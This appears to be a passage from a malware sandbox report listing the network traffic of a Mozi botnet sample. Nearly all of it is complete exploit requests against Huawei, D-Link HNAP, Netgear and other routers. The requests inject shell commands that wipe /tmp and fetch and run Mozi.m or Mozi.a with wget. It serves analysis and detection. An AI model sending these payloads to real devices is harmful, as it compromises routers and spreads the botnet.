7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.196.134.192:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 48.216.178.134:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 153.97.85.244:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 21.104.136.36:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 101.9.173.209:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 53.104.239.90:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 111.193.156.219:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
